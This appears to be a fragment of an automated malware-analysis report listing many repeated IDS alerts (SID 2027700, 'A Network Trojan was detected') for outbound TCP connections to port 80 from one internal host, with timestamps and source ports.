                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449985802027700 02/07/23-19:58:21.623964
                            SID:2027700
                            Source Port:49985
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449731802027700 02/07/23-19:57:13.477085
                            SID:2027700
                            Source Port:49731
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449798802027700 02/07/23-19:57:31.270025
                            SID:2027700
                            Source Port:49798
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449887802027700 02/07/23-19:57:55.996115
                            SID:2027700
                            Source Port:49887
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450249802027700 02/07/23-19:59:35.548839
                            SID:2027700
                            Source Port:50249
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450347802027700 02/07/23-20:00:03.721907
                            SID:2027700
                            Source Port:50347
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450445802027700 02/07/23-20:00:29.348634
                            SID:2027700
                            Source Port:50445
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449896802027700 02/07/23-19:57:58.170170
                            SID:2027700
                            Source Port:49896
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450350802027700 02/07/23-20:00:04.422898
                            SID:2027700
                            Source Port:50350
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449737802027700 02/07/23-19:57:14.935623
                            SID:2027700
                            Source Port:49737
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450252802027700 02/07/23-19:59:36.278597
                            SID:2027700
                            Source Port:50252
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449826802027700 02/07/23-19:57:37.847264
                            SID:2027700
                            Source Port:49826
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450163802027700 02/07/23-19:59:12.188385
                            SID:2027700
                            Source Port:50163
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450191802027700 02/07/23-19:59:18.961060
                            SID:2027700
                            Source Port:50191
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450261802027700 02/07/23-19:59:38.469324
                            SID:2027700
                            Source Port:50261
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450093802027700 02/07/23-19:58:52.513268
                            SID:2027700
                            Source Port:50093
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450280802027700 02/07/23-19:59:45.156579
                            SID:2027700
                            Source Port:50280
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449859802027700 02/07/23-19:57:49.355361
                            SID:2027700
                            Source Port:49859
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450356802027700 02/07/23-20:00:05.846184
                            SID:2027700
                            Source Port:50356
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450004802027700 02/07/23-19:58:28.516743
                            SID:2027700
                            Source Port:50004
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450102802027700 02/07/23-19:58:54.714299
                            SID:2027700
                            Source Port:50102
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450258802027700 02/07/23-19:59:37.739913
                            SID:2027700
                            Source Port:50258
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450089802027700 02/07/23-19:58:51.531272
                            SID:2027700
                            Source Port:50089
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449960802027700 02/07/23-19:58:15.604284
                            SID:2027700
                            Source Port:49960
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449868802027700 02/07/23-19:57:51.563260
                            SID:2027700
                            Source Port:49868
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450328802027700 02/07/23-19:59:56.770342
                            SID:2027700
                            Source Port:50328
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449709802027700 02/07/23-19:57:08.852068
                            SID:2027700
                            Source Port:49709
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449703802027700 02/07/23-19:57:06.000700
                            SID:2027700
                            Source Port:49703
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449810802027700 02/07/23-19:57:34.139598
                            SID:2027700
                            Source Port:49810
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449957802027700 02/07/23-19:58:14.905022
                            SID:2027700
                            Source Port:49957
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450417802027700 02/07/23-20:00:22.516624
                            SID:2027700
                            Source Port:50417
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450092802027700 02/07/23-19:58:52.278298
                            SID:2027700
                            Source Port:50092
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450179802027700 02/07/23-19:59:16.043396
                            SID:2027700
                            Source Port:50179
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449827802027700 02/07/23-19:57:38.087800
                            SID:2027700
                            Source Port:49827
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450322802027700 02/07/23-19:59:55.303213
                            SID:2027700
                            Source Port:50322
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450233802027700 02/07/23-19:59:31.718708
                            SID:2027700
                            Source Port:50233
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450418802027700 02/07/23-20:00:22.859106
                            SID:2027700
                            Source Port:50418
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450446802027700 02/07/23-20:00:29.582178
                            SID:2027700
                            Source Port:50446
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449929802027700 02/07/23-19:58:08.454291
                            SID:2027700
                            Source Port:49929
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450286802027700 02/07/23-19:59:46.657209
                            SID:2027700
                            Source Port:50286
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449797802027700 02/07/23-19:57:31.010574
                            SID:2027700
                            Source Port:49797
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450032802027700 02/07/23-19:58:35.551488
                            SID:2027700
                            Source Port:50032
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449740802027700 02/07/23-19:57:15.662783
                            SID:2027700
                            Source Port:49740
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449994802027700 02/07/23-19:58:24.905756
                            SID:2027700
                            Source Port:49994
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450121802027700 02/07/23-19:58:59.277722
                            SID:2027700
                            Source Port:50121
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450162802027700 02/07/23-19:59:11.945539
                            SID:2027700
                            Source Port:50162
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450375802027700 02/07/23-20:00:10.441776
                            SID:2027700
                            Source Port:50375
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450073802027700 02/07/23-19:58:47.629161
                            SID:2027700
                            Source Port:50073
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449900802027700 02/07/23-19:57:59.126282
                            SID:2027700
                            Source Port:49900
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449941802027700 02/07/23-19:58:11.058629
                            SID:2027700
                            Source Port:49941
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450217802027700 02/07/23-19:59:27.889673
                            SID:2027700
                            Source Port:50217
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449953802027700 02/07/23-19:58:13.951278
                            SID:2027700
                            Source Port:49953
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449944802027700 02/07/23-19:58:11.828444
                            SID:2027700
                            Source Port:49944
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450119802027700 02/07/23-19:58:58.794403
                            SID:2027700
                            Source Port:50119
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449855802027700 02/07/23-19:57:48.404554
                            SID:2027700
                            Source Port:49855
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450306802027700 02/07/23-19:59:51.473442
                            SID:2027700
                            Source Port:50306
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450036802027700 02/07/23-19:58:36.277046
                            SID:2027700
                            Source Port:50036
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450208802027700 02/07/23-19:59:25.676246
                            SID:2027700
                            Source Port:50208
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449769802027700 02/07/23-19:57:21.585123
                            SID:2027700
                            Source Port:49769
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449938802027700 02/07/23-19:58:10.348630
                            SID:2027700
                            Source Port:49938
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450220802027700 02/07/23-19:59:28.638484
                            SID:2027700
                            Source Port:50220
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450401802027700 02/07/23-20:00:16.704967
                            SID:2027700
                            Source Port:50401
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450391802027700 02/07/23-20:00:14.311492
                            SID:2027700
                            Source Port:50391
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450303802027700 02/07/23-19:59:50.704498
                            SID:2027700
                            Source Port:50303
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450045802027700 02/07/23-19:58:38.414558
                            SID:2027700
                            Source Port:50045
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449883802027700 02/07/23-19:57:54.965082
                            SID:2027700
                            Source Port:49883
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450051802027700 02/07/23-19:58:39.861264
                            SID:2027700
                            Source Port:50051
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450299802027700 02/07/23-19:59:49.758751
                            SID:2027700
                            Source Port:50299
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449916802027700 02/07/23-19:58:03.032699
                            SID:2027700
                            Source Port:49916
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450134802027700 02/07/23-19:59:04.959509
                            SID:2027700
                            Source Port:50134
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449785802027700 02/07/23-19:57:28.117998
                            SID:2027700
                            Source Port:49785
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450388802027700 02/07/23-20:00:13.583065
                            SID:2027700
                            Source Port:50388
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449972802027700 02/07/23-19:58:18.490991
                            SID:2027700
                            Source Port:49972
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450106802027700 02/07/23-19:58:55.697715
                            SID:2027700
                            Source Port:50106
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449966802027700 02/07/23-19:58:17.026384
                            SID:2027700
                            Source Port:49966
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450420802027700 02/07/23-20:00:23.363085
                            SID:2027700
                            Source Port:50420
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450017802027700 02/07/23-19:58:31.793987
                            SID:2027700
                            Source Port:50017
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449712802027700 02/07/23-19:57:09.572156
                            SID:2027700
                            Source Port:49712
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449801802027700 02/07/23-19:57:31.978610
                            SID:2027700
                            Source Port:49801
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449925802027700 02/07/23-19:58:07.476078
                            SID:2027700
                            Source Port:49925
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450236802027700 02/07/23-19:59:32.439969
                            SID:2027700
                            Source Port:50236
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449842802027700 02/07/23-19:57:41.717333
                            SID:2027700
                            Source Port:49842
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449753802027700 02/07/23-19:57:18.413042
                            SID:2027700
                            Source Port:49753
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450331802027700 02/07/23-19:59:57.512462
                            SID:2027700
                            Source Port:50331
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449699802027700 02/07/23-19:57:03.880243
                            SID:2027700
                            Source Port:49699
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450372802027700 02/07/23-20:00:09.704797
                            SID:2027700
                            Source Port:50372
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450461802027700 02/07/23-20:00:32.989437
                            SID:2027700
                            Source Port:50461
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449772802027700 02/07/23-19:57:22.305855
                            SID:2027700
                            Source Port:49772
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450188802027700 02/07/23-19:59:18.207900
                            SID:2027700
                            Source Port:50188
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450023802027700 02/07/23-19:58:33.280642
                            SID:2027700
                            Source Port:50023
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450064802027700 02/07/23-19:58:44.287580
                            SID:2027700
                            Source Port:50064
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450277802027700 02/07/23-19:59:44.403140
                            SID:2027700
                            Source Port:50277
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450319802027700 02/07/23-19:59:54.594853
                            SID:2027700
                            Source Port:50319
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450147802027700 02/07/23-19:59:08.302721
                            SID:2027700
                            Source Port:50147
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450151802027700 02/07/23-19:59:09.287465
                            SID:2027700
                            Source Port:50151
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449979802027700 02/07/23-19:58:20.181959
                            SID:2027700
                            Source Port:49979
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450439802027700 02/07/23-20:00:27.911911
                            SID:2027700
                            Source Port:50439
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449921802027700 02/07/23-19:58:04.595004
                            SID:2027700
                            Source Port:49921
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450390802027700 02/07/23-20:00:14.048984
                            SID:2027700
                            Source Port:50390
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450068802027700 02/07/23-19:58:46.433814
                            SID:2027700
                            Source Port:50068
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450424802027700 02/07/23-20:00:24.325922
                            SID:2027700
                            Source Port:50424
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450246802027700 02/07/23-19:59:34.827639
                            SID:2027700
                            Source Port:50246
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449743802027700 02/07/23-19:57:16.382887
                            SID:2027700
                            Source Port:49743
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449771802027700 02/07/23-19:57:22.069473
                            SID:2027700
                            Source Port:49771
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449899802027700 02/07/23-19:57:58.885147
                            SID:2027700
                            Source Port:49899
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450301802027700 02/07/23-19:59:50.234623
                            SID:2027700
                            Source Port:50301
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450279802027700 02/07/23-19:59:44.920542
                            SID:2027700
                            Source Port:50279
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450010802027700 02/07/23-19:58:30.047946
                            SID:2027700
                            Source Port:50010
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450362802027700 02/07/23-20:00:07.266629
                            SID:2027700
                            Source Port:50362
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450123802027700 02/07/23-19:58:59.760627
                            SID:2027700
                            Source Port:50123
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449838802027700 02/07/23-19:57:40.748973
                            SID:2027700
                            Source Port:49838
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450184802027700 02/07/23-19:59:17.230713
                            SID:2027700
                            Source Port:50184
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450380802027700 02/07/23-20:00:11.655903
                            SID:2027700
                            Source Port:50380
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450457802027700 02/07/23-20:00:31.981578
                            SID:2027700
                            Source Port:50457
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450105802027700 02/07/23-19:58:55.457749
                            SID:2027700
                            Source Port:50105
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449700802027700 02/07/23-19:57:04.269931
                            SID:2027700
                            Source Port:49700
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449856802027700 02/07/23-19:57:48.633799
                            SID:2027700
                            Source Port:49856
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450429802027700 02/07/23-20:00:25.500722
                            SID:2027700
                            Source Port:50429
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449833802027700 02/07/23-19:57:39.543463
                            SID:2027700
                            Source Port:49833
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450297802027700 02/07/23-19:59:49.266256
                            SID:2027700
                            Source Port:50297
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450452802027700 02/07/23-20:00:31.039414
                            SID:2027700
                            Source Port:50452
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450334802027700 02/07/23-19:59:58.221791
                            SID:2027700
                            Source Port:50334
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449874802027700 02/07/23-19:57:52.779348
                            SID:2027700
                            Source Port:49874
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449894802027700 02/07/23-19:57:57.677143
                            SID:2027700
                            Source Port:49894
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449911802027700 02/07/23-19:58:01.794028
                            SID:2027700
                            Source Port:49911
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450274802027700 02/07/23-19:59:42.509237
                            SID:2027700
                            Source Port:50274
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450256802027700 02/07/23-19:59:37.251534
                            SID:2027700
                            Source Port:50256
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450078802027700 02/07/23-19:58:48.869935
                            SID:2027700
                            Source Port:50078
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449715802027700 02/07/23-19:57:10.319689
                            SID:2027700
                            Source Port:49715
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449733802027700 02/07/23-19:57:13.945819
                            SID:2027700
                            Source Port:49733
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450096802027700 02/07/23-19:58:53.262318
                            SID:2027700
                            Source Port:50096
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450352802027700 02/07/23-20:00:04.891222
                            SID:2027700
                            Source Port:50352
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450156802027700 02/07/23-19:59:10.481824
                            SID:2027700
                            Source Port:50156
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450228802027700 02/07/23-19:59:30.531227
                            SID:2027700
                            Source Port:50228
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449805802027700 02/07/23-19:57:32.928581
                            SID:2027700
                            Source Port:49805
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450447802027700 02/07/23-20:00:29.817138
                            SID:2027700
                            Source Port:50447
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450406802027700 02/07/23-20:00:17.910532
                            SID:2027700
                            Source Port:50406
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449710802027700 02/07/23-19:57:09.099241
                            SID:2027700
                            Source Port:49710
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450115802027700 02/07/23-19:58:57.838937
                            SID:2027700
                            Source Port:50115
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450311802027700 02/07/23-19:59:52.679367
                            SID:2027700
                            Source Port:50311
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450133802027700 02/07/23-19:59:03.417426
                            SID:2027700
                            Source Port:50133
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450174802027700 02/07/23-19:59:14.839891
                            SID:2027700
                            Source Port:50174
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449828802027700 02/07/23-19:57:38.323716
                            SID:2027700
                            Source Port:49828
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450027802027700 02/07/23-19:58:34.302753
                            SID:2027700
                            Source Port:50027
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450284802027700 02/07/23-19:59:46.139610
                            SID:2027700
                            Source Port:50284
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449846802027700 02/07/23-19:57:42.696965
                            SID:2027700
                            Source Port:49846
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450462802027700 02/07/23-20:00:33.222235
                            SID:2027700
                            Source Port:50462
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450205802027700 02/07/23-19:59:23.312322
                            SID:2027700
                            Source Port:50205
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449705802027700 02/07/23-19:57:06.909903
                            SID:2027700
                            Source Port:49705
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.450321802027700 02/07/23-19:59:55.064377
                            SID:2027700
                            Source Port:50321
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.562.204.41.449962802027700 02/07/23-19:58:16.087938
                            SID:2027700
                            Source Port:49962
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
